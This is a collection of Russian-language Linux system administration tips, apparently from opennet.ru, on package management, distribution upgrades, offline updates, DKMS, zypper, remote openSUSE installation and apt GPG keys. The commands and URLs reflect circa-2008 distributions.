Для новых версий AltLinux и OpenSUSE не пройдет стандартный метод rpm2cpio packet.rpm | cpio -idmuv --no-absolute-filenames cpio выдаст ошибку, а при сохранении в файл и проверке утилитой file будут определены бинарные данные. Дело в том, что AltLinux и OpenSUSE перешли на использование алгоритма LZMA для сжатия cpio архива внутри RPM, поэтому для ручного раскрытия дополнительно нужно использовать утилиту lzma: rpm2cpio packet.rpm |lzma -d | cpio -idmuv --no-absolute-filenames Пакет с консольной утилитой lzma можно загрузить с сайта http://tukaani.org/lzma/ или поставить из пакетов (lzma или lzma-utils).

Использование apt-zip и yumdownloader для загрузки обновлений с другой машины (доп. ссылка 1) [комментарии]

apt-zip позволяет минимизировать ручные операции при обновлении Debian/Ubuntu на машине с медленным соединением к сети. Устанавливаем apt-zip: apt-get install apt-zip В /etc/apt/apt-zip.conf определяем носитель для переноса пакетов между машинами. Например, меняем "MEDIUM=/media/zip" на "MEDIUM=/media/disk" Обновляем кеш пакетов: apt-get update Записываем на Flash диск примонтированный как /media/disk список пакетов для обновления: apt-zip-list На Flash будет записан shell скрипт (fetch-script-wget-имя_машины ) для загрузки пакетов при помощи утилиты wget. На машине с высокоскоростным линком достаточно просто запустить этот скрипт. Тип обновления задается в /etc/apt/apt-zip.conf через переменную DEFAULT_APTGETACTION: upgrade - обновление уже установленных пакетов из репозиториев, определенных в /etc/apt/sources.list dselect-upgrade - от upgrade отличается использованием dselect dist-upgrade - поддерживает расширенный разрешения конфликтов, больше подходит для выполнения обновления всего дистрибутива до более новой версии. После того как необходимые пакеты будут скопированы на Flash, на машине на которой нужно произвести обновление необходимо выполнить: apt-zip-inst Для запроса установки новых дополнительных пакетов можно использовать: apt-zip-list -a upgrade -p openoffice.org,digikam ... apt-zip-inst -a upgrade -p openoffice.org,digikam -------------- Рекомендации от _selivan_. Если дома есть dial-up, создаем скрипт upd.sh: #!/bin/bash # Usage: get_soft_links.sh <package1> ... <packageN> URLS=soft`date +%F_%H.%M`-urls.txt LIST=soft`date +%F_%H.%M`-list.txt DIR=~/links # get links apt-get --print-uris -y -qq dist-upgrade | cut -d\' -f2 > $DIR/$URLS apt-get --print-uris -y -qq install $@ | cut -d\' -f2 >> $DIR/$URLS # print names of requested packages to file echo $@ > $DIR/$LIST #convert unix newline format to windows for windows download managers sed -i -e 's/$/\r/' $DIR/$URLS Если диалапа нет - на один шаг больше: apt-get --print-uris update ... -------------- Рекомендации от sHaggY_caT по использованию yumdownloader в Fedora, Centos, ASP и других Red Hat-подобных дистрибутивах: Ставим yum-utils. Для генерации листа закачки можно использовать скрипт (первый аргумент название пакета, второй, имя выходного файла): #!/bin/sh yumdownloader --urls $1 | sed '1,2d' > /media/disk/$2.txt Удаление первых двух строк поставлено, так как там служебная информация от плагинов и yum. К сожалению, yum не разделяет вывод служебной информации и результат на потоки, по этому, сделать 2>/dev/null нельзя Что касается машины совсем без интернета, в тут возможность подобная "apt-get --print-uris update" не получится. Можно только сгенерировать список для загрузки с ключем "-C": yumdownloader -C --urls пакет Преварительно нужно все-таки обновить кэш с помощью "yum update". В основанных на Red Hat дистрибутивах скаченные пакеты можно либо с помощью yum либо с помощью rpm: yum localinstall название_файлов_пакетов_через_пробел rpm -Uhv название_файлов_пакетов_через_пробел Yum скачает недостающие зависимости. Если список был сгенерирован верно, то это не нужно, и необходимо использовать rpm. Две полезные команды, которые установят все rpm-пакеты из текущей директории: ls -l | grep rpm | awk '{print $9}' | xargs yum localinstall ls -l | grep rpm | awk '{print $9}' | xargs rpm -Uhv -------------- Как заставить apt-get установить вручную загруженные пакеты: https://www.opennet.ru/tips/info/1707.shtml Для загрузки обновлений на внешней машине с Windows можно использовать Keryx (https://www.opennet.ru/opennews/art.shtml?num=19650) В графическом интерфейсе synaptic есть возможность сгенерировать скрипт для загрузки выбранных пакетов с их последующей установкой: "генерировать скрипт закачки пакетов" и "добавить закаченные пакеты".

Инструкция по обновлению Fedora 9 до Fedora 10 (доп. ссылка 1) [комментарии]

Первым шагом обновляем базу пакетов текущего релиза: yum -y update Чистим кэш yum: yum clean all Устанавливаем пакет preupdate: yum install preupgrade Запускаем GUI интерфейс для проведения обновления (выбираем "Fedora 10"): preupgrade На сервере без X window запускаем консольный вариант: preupgrade-cli "Fedora 10 (Cambridge)" Вариант 2. Используем средсва yum. Устанавливаем RPM-пакеты с параметрами нового релиза: rpm -Uvh ftp://download.fedora.redhat.com/pub/fedora/linux/releases/10/Fedora/i386/os/Packages/fedora-release-*.noarch.rpm Для архитектуры x86_64 меняем в пути "/i386/" на "/x86_64/" Инициируем процесс обновления: yum upgrade При использовании репозитория RPMFusion, его нужно обновить отдельно: rpm -Uvh http://download1.rpmfusion.org/free/fedora/rpmfusion-free-release-stable.noarch.rpm \ http://download1.rpmfusion.org/nonfree/fedora/rpmfusion-nonfree-release-stable.noarch.rpm yum -y update

Общий yum cache для нескольких машин (доп. ссылка 1) Автор: Жольнай Кирилл [комментарии]

Берем самый yum-активный из серверов локальной сети, и расшариваем /var/cache/yum по NFS: В /etc/exports добавляем: /var/cache/yum 192.168.0.212/255.255.255.0(rw) Перезапускаем NFS: service nfs restart Включаем хранение кэша в /etc/yum.conf как на сервере, так и на клиенте: В /etc/yum.conf меняем keepcache=0 на keepcache=1: sed -i 's/keepcache=0/keepcache=1/' /etc/yum.conf На клиентской машине монтируем нужные нам папки, в /etc/fstab добавляем: # yum common cache 192.168.0.231:/var/cache/yum/base/packages /var/cache/yum/base/packages nfs 192.168.0.231:/var/cache/yum/updates/packages /var/cache/yum/updates/packages nfs 192.168.0.231:/var/cache/yum/addons/packages /var/cache/addons/base/packages nfs 192.168.0.231:/var/cache/yum/centosplus/packages /var/cache/addons/centosplus/packages nfs 192.168.0.231:/var/cache/yum/extras/packages /var/cache/addons/extras/packages nfs И монтируем их: mount -a Если ему каких-нибудь папок не хватит - создайте: mkdir -p /var/cache/yum/{base,updates,addons,centosplus,extras}/packages Все, пакеты теперь будут скачиваться один раз. В случае недоступности сервера ничего страшного не произойдет - просто пакет скачается.

Использование DKMS для перестроения драйверов без их пересборки при обновлении Linux ядра [комментарии]

В Ubuntu 8.10 интегрирована технология DKMS (Dynamic Kernel Module Support, http://linux.dell.com/dkms), позволяющая автоматически перестраивать текущие модули ядра с драйверами устройств после обновления версии ядра. Пример 1. Драйвер mad-wifi на ноутбуке Samsung R25 с wifi-картой на чипсете Atheros AR242x. Оригинал заметки: http://blog.antage.name/2008/11/atheros-wifi-dkms.html 1. Ставим DKMS: sudo apt-get install dkms 2. Качаем и распаковываем исходники драйвера: cd wget http://snapshots.madwifi-project.org/madwifi-hal-0.10.5.6/madwifi-hal-0.10.5.6-r3875-20081105.tar.gz sudo tar xzf madwifi-hal-0.10.5.6-r3875-20081105.tar.gz -C /usr/src/ 3. Создаем конфиг модуля в файле /usr/src/madwifi-hal-0.10.5.6-r3875-20081105/dkms.conf: PACKAGE_NAME="madwifi-hal" PACKAGE_VERSION="0.10.5.6-r3875-20081105" AUTOINSTALL="yes" BUILT_MODULE_NAME[0]="ath_pci" BUILT_MODULE_LOCATION[0]="ath/" DEST_MODULE_LOCATION[0]="/kernel/net/" BUILT_MODULE_NAME[1]="ath_hal" BUILT_MODULE_LOCATION[1]="ath_hal/" DEST_MODULE_LOCATION[1]="/kernel/net/" BUILT_MODULE_NAME[2]="ath_rate_sample" BUILT_MODULE_LOCATION[2]="ath_rate/sample/" DEST_MODULE_LOCATION[2]="/kernel/net/" BUILT_MODULE_NAME[3]="ath_rate_minstrel" BUILT_MODULE_LOCATION[3]="ath_rate/minstrel/" DEST_MODULE_LOCATION[3]="/kernel/net/" BUILT_MODULE_NAME[4]="ath_rate_amrr" BUILT_MODULE_LOCATION[4]="ath_rate/amrr/" DEST_MODULE_LOCATION[4]="/kernel/net/" BUILT_MODULE_NAME[5]="ath_rate_onoe" BUILT_MODULE_LOCATION[5]="ath_rate/onoe/" DEST_MODULE_LOCATION[5]="/kernel/net/" BUILT_MODULE_NAME[6]="wlan" BUILT_MODULE_LOCATION[6]="net80211/" DEST_MODULE_LOCATION[6]="/kernel/net/" BUILT_MODULE_NAME[7]="wlan_scan_ap" BUILT_MODULE_LOCATION[7]="net80211/" DEST_MODULE_LOCATION[7]="/kernel/net/" BUILT_MODULE_NAME[8]="wlan_scan_sta" BUILT_MODULE_LOCATION[8]="net80211/" DEST_MODULE_LOCATION[8]="/kernel/net/" BUILT_MODULE_NAME[9]="wlan_tkip" BUILT_MODULE_LOCATION[9]="net80211/" DEST_MODULE_LOCATION[9]="/kernel/net/" BUILT_MODULE_NAME[10]="wlan_xauth" BUILT_MODULE_LOCATION[10]="net80211/" DEST_MODULE_LOCATION[10]="/kernel/net/" BUILT_MODULE_NAME[11]="wlan_wep" BUILT_MODULE_LOCATION[11]="net80211/" DEST_MODULE_LOCATION[11]="/kernel/net/" BUILT_MODULE_NAME[12]="wlan_ccmp" BUILT_MODULE_LOCATION[12]="net80211/" DEST_MODULE_LOCATION[12]="/kernel/net/" BUILT_MODULE_NAME[13]="wlan_acl" BUILT_MODULE_LOCATION[13]="net80211/" DEST_MODULE_LOCATION[13]="/kernel/net/" 4. Добавлем драйвер в DKMS: sudo dkms add -m madwifi-hal -v 0.10.5.6-r3875-20081105 5. Собираем и инсталлируем: sudo dkms build -m madwifi-hal -v 0.10.5.6-r3875-20081105 sudo dkms install -m madwifi-hal -v 0.10.5.6-r3875-20081105 Пример 2. Автосборка модуля файловой системы BTRFS при обновлении ядра. Оригинал заметки: http://deepwalker.blogspot.com/2008/11/810-dkms-nvidia-btrfs.html Загружаем исходники модуля ядра и кладем их в /usr/src/btrfs-0.16. В том же каталоге создаем dkms.conf следующего содержания: MAKE[0]=make BUILT_MODULE_NAME[0]=btrfs DEST_MODULE_LOCATION[0]="/kernel/fs/btrfs" PACKAGE_NAME="btrfs" PACKAGE_VERSION="0.16" CLEAN="make clean" AUTOINSTALL="yes" Далее следует серия команд для запуска модуля в работу: # dkms add -m btrfs -v 0.16 # dkms add -m btrfs -v 0.16 Creating symlink /var/lib/dkms/btrfs/0.16/source -> /usr/src/btrfs-0.16 DKMS: add Completed. # dkms build -m btrfs -v 0.16 Kernel preparation unnecessary for this kernel. Skipping... Building module: cleaning build area.... make KERNELRELEASE=2.6.27-7-generic............ cleaning build area.... DKMS: build Completed. # dkms install -m btrfs -v 0.16 Running module version sanity check. btrfs.ko: - Original module - No original module exists within this kernel - Installation - Installing to /lib/modules/2.6.27-7-generic/updates/dkms/ depmod........ DKMS: install Completed. modprobe btrfs

Решение проблем с некорректно установленными пакетами в Debian и Ubuntu (доп. ссылка 1) Автор: Okulov Vitaliy [комментарии]

После обновления ОС и установки gnome столкнулся с проблемой: dpkg: ../../src/packages.c:191: process_queue: Assertion 'dependtry <= 4' failed Соотвественно пакеты больше не ставились и не обновлялись. Погуглив решил проблему следующим образом: sudo dpkg -l | grep -v ^ii dpkg -l выводит список установленных пакетов, grep -v ^ii - оставляет в выводе только неправильно установленные пакеты. После получения списка таких пакетов, удалил первый из списка неправильно установленный пакет командой sudo dpkg -purge remove имя_пакета После вышеуказанных манипуляций проблема ушла.

Примеры использования пакетного менеджера Zypper в openSUSE (доп. ссылка 1) [комментарии]

Найти заданный пакет по имени: zypper se banshee-1 zypper se bans* По умолчанию в результатах поиска отображается имя, описание и тип. Для промотора дополнительных параметров, например, номера версии и имени репозитория, можно использовать: zypper se -s пакет Вывод краткой справки по пакету: zypper if пакет Удаление пакетов по маске: zypper rm gtk*devel* Установка пакетов по маске: zypper in gtk-sharp? Удаление пакета с версией старше заданной: zypper rm пакет>1.2.3 Установка и удаление одной командой: zypper in пакет_для_установки -пакет_для_удаления +пакет_для_установки Принудительная установка уже присутствующего в системе пакета: zypper in --force пакет Установка RPM пакетов из файла, а не из репозитория: zypper in ./file.rpm zypper in http://<;url>/file.rpm Обновить все установленные в системе пакеты (исправления проблем безопасности и критических ошибок): zypper up Обновить систему до более новой версии openSUSE: zypper dup Установить программы, необходимые для пересборки заданного пакета из исходных текстов: zypper si -d пакет Посмотреть список мета-пакетов (сгруппированных наборов): zypper pt Установить мета-пакет: zypper in -t pattern xfce Найти мета-пакет по маске: zypper se -t pattern media Посмотреть список доступных репозиториев пакетов: zypper lr Добавить новый репозиторий: zypper ar <url> <name> Временно отключить первый репозиторий в списке: zypper mr -d 1 Временно отключить репозиторий по имени: zypper mr -d repo-oss Удалить первый репозиторий из списка: zypper rr 1 Выполнение действия в тестовом режиме, без фактического выполнения операции: zypper in --dry-run пакет Заморозить состояние пакета в текущем виде, для предотвращения случайной установки или удаления: zypper addlock пакет Снятие блокировки: zypper removelock пакет

Установка OpenSUSE на удаленной машине с управлением по SSH (доп. ссылка 1) [обсудить]

На машине, на которой планируется установка, загружаем ядро и образ ram-диска: cd /tmp wget http://mirrors.kernel.org/opensuse/distribution/11.0/repo/oss/boot/i386/loader/linux wget http://mirrors.kernel.org/opensuse/distribution/11.0/repo/oss/boot/i386/loader/initrd cp linux /boot/vmlinuz.install cp initrd /boot/initrd.install Модифицируем настройки Grub, /boot/grub/menu.lst (параметры kernel нужно переписать в одну строку) title Boot -- openSUSE 11.0 root (hd0,0) kernel /boot/vmlinuz.install noapic usessh=1 sshpassword="12345645" install=http://mirrors.kernel.org/opensuse/distribution/11.0/repo/oss/ hostip=192.168.42.2 gateway=192.168.42.1 nameserver=192.168.42.1 initrd /boot/initrd.install Где 192.168.42.2 - IP машины на которую производится установка, 192.168.42.1 - DNS и шлюз 12345645 - пароль по которому будет осуществлен вход на устанавливаемую машину по SSH Скрипт для автоматизации вышеприведенных действий можно загрузить по ссылке http://www.suse.de/~lnussel/setupgrubfornfsinstall.html После перезагрузки, заходим c паролем 12345645: ssh -X root@192.168.42.2 и начинаем процесс установки запустив yast (текстовый режим) или yast2 (графический режим). В случае обрыва процесса установки его можно продолжить, повторив настройки grub и выполнив после входа по SSH: /usr/lib/YaST2/startup/YaST2.ssh При наличии "чистой" машины образ ядра можно загрузить по сети при помощи PXE. Пример можно найти в материале: http://wiki.opennet.ru/NetworkBoot Конфигурация pxelinux будет выглядеть примерно так: default pxelinux prompt 1 timeout 600 label pxelinux.install kernel vmlinuz append initrd=initrd.install noapic usessh=1 sshpassword="12345645" install=http://mirrors.kernel.org/opensuse/distribution/11.0/repo/oss/ hostip=192.168.42.2 gateway=192.168.42.1 nameserver=192.168.42.1

Создание установочного LiveUSB с Ubuntu и OpenSUSE Linux (доп. ссылка 1) Автор: Roman Tuz [комментарии]

Подготовка загрузочного Flash для установки Ubuntu Linux. Устанавливаем syslinux: sudo apt-get install syslinux Устанавливаем загрузчик на Flash (/dev/sdb1 - определить можно из вывода mount или dmesg): syslinux -s /dev/sdb1 Копируем полностью содержимое стандартного установочного LiveCD диска с Ubuntu Linux на Flash. Копируем из директории casper два файла vmlinuz и initrd.gz в корень Flash, а также все файлы из деректорий isolinux и install. Переименовываем файл isolinux.cfg в syslinux.cfg. Другой вариант - создание LiveUSB через специальный GUI интерфейс: В /etc/apt/sources.list добавляем репозиторий: deb http://ppa.launchpad.net/probono/ubuntu hardy main Ставим пакет liveusb: sudo apt-get update sudo apt-get install liveusb Монтируем образ загрузочного диска: sudo mount -o loop -tiso9660 ubuntu-8.04.1-desktop-i386.iso /cdrom Запускаем программу из "Система" - "Администрирование" - "Установить Live USB". Для создания установочного USB диска с OpenSUSE выполняем. Устанавливаем syslinux: zypper install syslinux Монтируем установочный ISO образ в директорию /mnt mount -o loop ./openSUSE-11.0-DVD-i386.iso /mnt/cdrom Вставляем usb flash и находим устройство к которому она подключена, анализируя вывод команд: fdisk -l cat /proc/partitions mount dmesg После того как определили искомый /dev/sdb, монтируем Flash: mount /dev/sdb /mnt/flash Копируем на Flash содержимое установочного диска, отдельно перенеся загрузчик в корень: cp /mnt/cdrom/boot/i386/loader/* /mnt/flash и переименовав файл конфигурации: mv /mnt/flash/isolinux.cfg /mnt/flash/syslinux.cfg Отмонтируем flash и устанавливаем загрузчик: umount /mnt/flash syslinux /dev/sdb

Как заставить apt-get установить вручную загруженные пакеты [комментарии]

В графическом интерфейсе synaptic есть возможность сгенерировать скрипт для загрузки выбранных пакетов с их последующей установкой: "генерировать скрипт закачки пакетов" и "добавить закаченные пакеты". Там где synaptic недоступен, можно поступить иначе: При указании опции --print-uris в apt-get, вместо установки будет выведен список адресов для загрузки выбранных пакетов с учетом зависимостей. apt-get -y --print-uris install список_пакетов посмотреть какие пакеты нужно загрузить для обновления: apt-get -y --print-uris upgrade apt-get -y --print-uris dist-upgrade посмотреть какие индексы нужно загрузить: apt-get --print-uris update Эти пакеты можно загрузить отдельно и скопировать в /var/cache/apt/archives, например: apt-get -qq -y --print-uris upgrade | cut -f1 -d' ' | tr -d "'" > packet_list.txt cd /var/cache/apt/archives wget --input-file packet_list.txt затем повторить команду "apt-get install список_пакетов", пакеты будут установлены из кэша Вместо /var/cache/apt/archives можно указать и другую директорию: apt-get -o dir::cache::archives="/download" install список_пакетов

Использование http-прокси в APT и при обновлении Ubuntu Автор: Heckfy [комментарии]

Для обновления дистрибутива ubuntu до новейшего необходимо выполнить: $ sudo update-manager -d Если сообщения о новом дистрибутиве почему-то нет, но оно должно быть, необходимо настроить "Сервис прокси". Пример: $ http_proxy='http://proxy.test.ru:3128/' sudo update-manager -d Апдейт менеджер можно заменить на do-release-upgrade Работа apt-get и некоторых других консольных приложений через прокси осуществляется аналогичным образом: export http_proxy=http://username:password@host:port/ export ftp_proxy=http://username:password@host:port/ Еще один способ конфигурирования работы apt через прокси: Создаем /etc/apt/apt.conf.d/01proxy: Acquire { http::Proxy "http://username:password@host:port/"; }

Настройка поддержки мультимедиа в Ubuntu 8.04 (доп. ссылка 1) [комментарии]

Подсказка про установку аудио и видео-кодеков, поддержки просмотра защищенных DVD. sudo apt-get install gstreamer0.10-plugins-ugly-multiverse \ gstreamer0.10-plugins-bad-multiverse gstreamer0.10-plugins-bad \ gstreamer0.10-plugins-ugly gstreamer0.10-ffmpeg libxine1-ffmpeg \ libdvdread3 liblame0 В /etc/apt/sources.list добавляем репозиторий Medibuntu: deb http://packages.medibuntu.org/ hardy free non-free Импортируем PGP ключ и устанавливаем libdvdcss2 и w32-кодеки: wget -q http://packages.medibuntu.org/medibuntu-key.gpg -O- \ | sudo apt-key add - sudo apt-get update sudo apt-get install libdvdcss2 w32codecs ffmpeg Дополнительные закрытые компоненты, включая flash плагин, java, шрифты. sudo apt-get install flashplugin-nonfree libflashsupport (или можно поставить открытый аналог flash - mozilla-plugin-gnash) sudo apt-get install sun-java6-fonts sun-java6-jre sun-java6-plugin sudo apt-get install msttcorefonts Поддержку мультимедиа можно поставить одной командой: sudo apt-get install ubuntu-restricted-extras Для Kubuntu - kubuntu-restricted-extras, для xubuntu - xubuntu-restricted-extras Недостающие кодеки для Ubuntu и Debian можно попытаться найти в репозитории http://debian-multimedia.org/

Как в Debian/Ubuntu установить пакет с диска с учетом зависимостей (доп. ссылка 1) Автор: Tigro [комментарии]

Установка .deb пакета, уже загруженного на локальный диск, с разрешением зависимостей и доустановкой недостающих пакетов: gdebi пакет.deb

Перекомпиляция пакета в Debian и Ubuntu (доп. ссылка 1) [комментарии]

Перекомпиляция пакета может понадобиться например, для упаковки более новой версии программы, наложения определенного патча или пересборки с особенными опциями. Устанавливаем программы, необходимые для сборки пакетов: apt-get install devscripts apt-get install build-essential В /etc/apt/sources.list раскомментируем строки с deb-src для нужного репозитория, например: deb-src http://ftp.us.debian.org/debian/ etch main non-free contrib Загружаем пакет с исходными текстами в текущую директорию: apt-get source имя_пакета Если под рукой уже есть .dsc, tar.gz и diff.gz файлы, раскрываем их командой: dpkg-source -x имя_пакета.dsc Устанавливаем зависимые пакеты (библиотеки, заголовочные файлы и т.д.), требуемые для сборки: apt-get build-dep имя_пакета Вносим изменения в появившейся директории "имя_пакета-версия". Если собрались импортировать в пакет более новую версию программы, то воспользуемся утилитой uupdate: uupdate -u путь_к_tar_gz_архиву_c_более_новой_версией_программы При этом в автоматическом режиме будут адаптированы патчи от старой версии, в случае несостыковок придется исправлять патчи руками. Собираем пакет: cd имя_пакета-версия debuild -us -uc "-us" и "-uc" указываем так как не являемся мантейнером пакета и не можем создать цифровую подпись для пакета. Вместо враппера debuild можем напрямую использовать: dpkg-buildpackage -rfakeroot После сборки готовый пакет появится в родительской директории, устанавливаем его: cd .. dpkg -i <package_file.deb> Пример для пакета с MySQL: mkdir build cd build apt-get source mysql-server-5.0 apt-get build-dep mysql-server-5.0 cd mysql-dfsg-5.0-5.0.32 debuild -us -uc cd .. dpkg -i *.deb

Как обновить только пакеты находящиеся в архиве APT (доп. ссылка 1) Автор: Stanislav Kislicin [обсудить]

Для того чтобы заставить apt обновить систему используя только пакеты из кэша /var/cache/apt/archives, а не лезть за ними в интернет, нужно выполнить: apt-get -no-download -ignore-missing upgrade Если пакета нет в кэше, он не будет поставлен.

Обеспечение безопасности посредством GLSA в Gentoo Linux (доп. ссылка 1) Автор: daevy [комментарии]

Постоянное обновление системы - одно из важнейших мероприятий по обеспечению безопасности. Можно следить за обновлениями посредством GLSA, для этого не обходимо чтобы в системе был установлен пакет app-portage/gentoolkit. в составе пакета идет утилита glsa-check, с которой нам и предстоит работать. Итак преступим. Сначала можно посмотреть все доступные выпуски GLSA # glsa-check -l Все строки, содержащие [A] и [U], можно проигнорировать, т.к. они неприменимы для данной системы. Теперь проверим подвержена ли наша система GLSA # glsa-check -t all Или можно просмотреть пакеты которые необходимо переустановить # glsa-check -p $(glsa-check -t all) И применить их... # glsa-check -f $(glsa-check -t all) И конечно перезапускаем те демоны, которые подверглись переустановке.

Установка пакетов с пересборкой из исходных текстов в Ubuntu Linux (доп. ссылка 1) Автор: openkazan.info [комментарии]

Устанавливаем пакет apt-build: apt-get install apt-build Настраиваем его командой dpkg-reconfigure apt-build, тут нам надо будет ответить на вопросы об уровне оптимизации и об архитектуре вашего процессора. Далее надо убедится, что у нас раскоментированы репозитарии исходников в /etc/apt/sources.list (эти строки начинаются с deb-src). Обновляем список репозитариев apt-get update. Ну и всё, дальше вместо apt-get используем apt-build. Ключи и опции apt-build такие же как и у apt-get: apt-build update - обновление списка репозитариев и софта в них, apt-build upgrade - апгрейд установленных пакетов, apt-build install - устанавливаем программу, apt-build world - а это перекомпилит всю вашу систему! Тут всё на ваш страх и риск! При первом запуске apt-build вы увидите следующее сообщение об ошибке: -----Rebuilding the world!----- -----Building package list----- Please read README.Debian first. Просто apt-build не знает какой софт у вас установлен. Для того чтобы побороть эту ошибку достаточно ввести команду: dpkg --get-selections | awk '{if ($2 == "install") print $1}'> /etc/apt/apt-build.list Ну а дальше работаем с apt-build как с apt-get. Рекомендую вставлять ключи --yes and --force-yes для того чтобы весь процесс проходил на автомате.

Использование шаблонов при поиске пакетов в Aptitude (доп. ссылка 1) Автор: jetxee [комментарии]

Список полезных шаблонов, которые можно использовать в aptitude search ~nимя - в имени встречается текст "имя" (можно использовать регулярные выражения, например, ~n^lib отбирает только имена начинающиеся с lib) ~dтекст - в описании пакета встречается "текст" (очень полезно, если название программы неизвестно, но известно, что она должна делать) ~i - отбирает только уже установленные пакеты ~N - отбирает только новые пакеты (которых раньше не было в репозитории) ~U - отбирает пакеты, которые можно обновить ~Dтребование - отбирает пакеты, которые зависят от "требования" (можно использовать регулярные выражения) ~Rзависимый - отбирает пакеты, которые необходимы для "зависимого" (можно использовать регулярные выражения) | - логическое "ИЛИ" ! - логическое отрицание Например: Найти пакеты в имени которого встречается kde: aptitude search ~nkde Найти пакеты в описании к которым встречается HDR и image: aptitude search ~dHDR~dimage Найти пакеты в названии которых встречается aptitude. но в системе они не установлены: aptitude search '!~i~naptitude' Найти установленные пакеты в названии которых встречается firefox или iceweasel: aptitude search '~i(~nfirefox|~niceweasel)'

Как обновить CentOS 5.0 до CentOS 5.1 и Fedora 7 до Fedora 8 [обсудить]

Для обновления в пределах одной подверсии (например, с 4.0 до 4.6 или с 5.0 до 5.1) достаточно выполнить yum update Для обновления "major" релизов CentOS лучше воспользоваться пунктом Upgrade в инсталляторе. Для обновления версий Fedora: yum update yum clean all rpm -Uhv \ http://download.fedora.redhat.com/pub/fedora/linux/releases/8/Fedora/i386/os/Packages/fedora-release-8-3.noarch.rpm\ http://download.fedora.redhat.com/pub/fedora/linux/releases/8/Fedora/i386/os/Packages/fedora-release-notes-8.0.0-3.noarch.rpm yum update Читаем про особенности обновления между релизами http://fedoraproject.org/wiki/YumUpgradeFaq

Модификация образа загрузочного RAM диска (initrd) в Linux [комментарии]

Задача добавить модуль ядра usb-storage в "initrd.img" от Fedora Linux для загрузки с диска с USB интерфейсом. mkdir ./initrd mv ./initrd.img ./initrd.img.gz gunzip ./initrd.img Метод 1. initrd.img в виде сжатого образа файловой системы mount -o loop ./initrd.img ./initrd Метод 2. initrd.img в виде сжатого cpio архива cd ./initrd cpio -ic < ../initrd.img Копируем в ./initrd/lib модуль usb-storage.ko (следим, чтобы уже были модули scsi_mod.ko, (o|e|u)hci-hcd.ko, usbcore.ko) Прописываем "insmod /lib/usb-storage.ko" в конец списка загрузки модулей ./initrd/init Может потребоваться скопировать команду sleep и прописать после загрузки модуля usb-storage задержку, необходимую на обнаружения накопителя. umount ./initrd # для метода 1. cd ./initrd find . -print| cpio -oc |gzip -9 -c > ../initrd_new.img # для метода 2. Другой вариант упаковки (для Fedora 8): find . -print| cpio -H newc -o |gzip -9 -c > ../initrd_new.img При загрузке с USB диска большого объема (250Гб) при установке ОС в разделе в центре диска не удалось использовать Lilo и Grub. Lilo при загрузке ругался на несоответствие текущей геометрии диска той что была в момент его установки. Установка Grub привела к зависанию ноутбука в момент опроса USB диска (проблема BIOS). Выход нашелся в установке загрузчика от FreeBSD: 1. Делаем бэкап текущего MBR USB диска: dd if=/dev/sda of=mbr_sda.bin bs=1 count=512 2. Берем boot0 из комплекта FreeBSD и копируем в него данные о таблицах разделов текущего диска: dd if=mbr_sda.bin of=boot0 bs=1 count=66 skip=446 seek=446 3. Копируем загрузчик в MBR USB диска: dd if=boot0 of=/dev/sda bs=1 count=512 4. В текущий раздел Linux устанавливаем Grub: # grub grub> find /boot/grub/stage1 (hd0,1) раздел /dev/sda2 grub> root (hd0,1) grub> setup (hd0,1)

apt + gpg: как добавить сигнатуру репозитория Автор: Heckfy [комментарии]

После обновления до Etch в APT появилось много изменений. Одно из них - защита от подмены доменной записи. # apt-get update W: GPG error: http://deb.opera.com stable Release: The following signatures couldn't be verified because the public key is not available: +NO_PUBKEY 033431536A423791 W: You may want to run apt-get update to correct these problems Для решения проблемы с "apt-get update" предлагается запустить "apt-get update". Не будем зацикливаться. Получим публичный ключ и сохраним его в пользовательской базе: $ sudo gpg --keyserver subkeys.pgp.net --recv-keys 033431536A423791 gpg: requesting key 6A423791 from hkp server subkeys.pgp.net gpg: key 6A423791: public key "Opera Software Archive Automatic Signing Key <hostmaster@opera.com>" imported gpg: no ultimately trusted keys found gpg: Total number processed: 1 gpg: imported: 1 Теперь отдадим нашему apt ключ: $ gpg --armor --export 033431536A423791 | sudo apt-key add - OK Что-то произошло. $ ls -l /etc/apt total 40 -rw-r--r-- 1 root root 2524 Nov 14 2006 apt-file.conf drwxr-xr-x 2 root root 112 May 27 02:54 apt.conf.d -rw-r--r-- 1 root root 98 May 27 02:54 listchanges.conf -rw------- 1 root root 0 May 25 10:08 secring.gpg -rw-r--r-- 1 root root 1059 May 25 02:15 sources.list -rw-r--r-- 1 root root 812 May 24 00:19 sources.list-sarge drwxr-xr-x 2 root root 48 Feb 27 00:21 sources.list.d -rw-r--r-- 1 root root 632 Nov 12 2005 sources.list~ -rw------- 1 root root 1200 May 30 10:26 trustdb.gpg -rw-r--r-- 1 root root 4473 May 30 10:26 trusted.gpg -rw-r--r-- 1 root root 4473 May 30 10:26 trusted.gpg~ Сегодня - May 30. Не знаю, что там в trust*, но это нравится нашему apt: $ sudo apt-get update Ign file: stable Release.gpg Ign file: stable Release.gpg Ign file: stable Release.gpg Get:1 file: stable Release [802B] Get:2 file: stable Release [627B] Get:3 file: stable Release [627B] Ign file: stable/main Packages Ign file: stable/main Packages Ign file: stable/main Packages Get:4 http://deb.opera.com stable Release.gpg [189B] Hit http://deb.opera.com stable Release Ign http://deb.opera.com stable/non-free Packages/DiffIndex Ign http://deb.opera.com stable/non-free Packages Hit http://deb.opera.com stable/non-free Packages Fetched 189B in 0s (227B/s) Reading package lists... Done На всякий случай, посмотрим, что еще изменилось за сегодня в системе: $ locate gpg > 1 # updatedb && locate gpg > 2 && diff 1 2 56a60,65 > /home/hec/.gnupg/pubring.gpg > /home/hec/.gnupg/pubring.gpg~ > /home/hec/.gnupg/secring.gpg > /home/hec/.gnupg/trustdb.gpg > /home/hec/.local/share/applications/menu-xdg/X-Debian-Apps-Tools-kgpg.desktop 390c404 < /var/lib/apt/lists/partial/deb.opera.com_opera_dists_stable_Release.gpg --- > /var/lib/apt/lists/deb.opera.com_opera_dists_stable_Release.gpg Создались и изменились файлы в ~/.gnupg и deb.opera. com_opera_dists_stable_Release.gpg перешел из /var/lib/apt/lists/partial/ в /var/lib/apt/lists/ Ссылки по теме: http://strugglers.net/wiki/The_following_signatures_couldn't_be_verified http://www.osp.ru/lan/1997/07/132968/ - Атака и защита DNS

Примеры управления пакетами через dpkg (доп. ссылка 1) [комментарии]

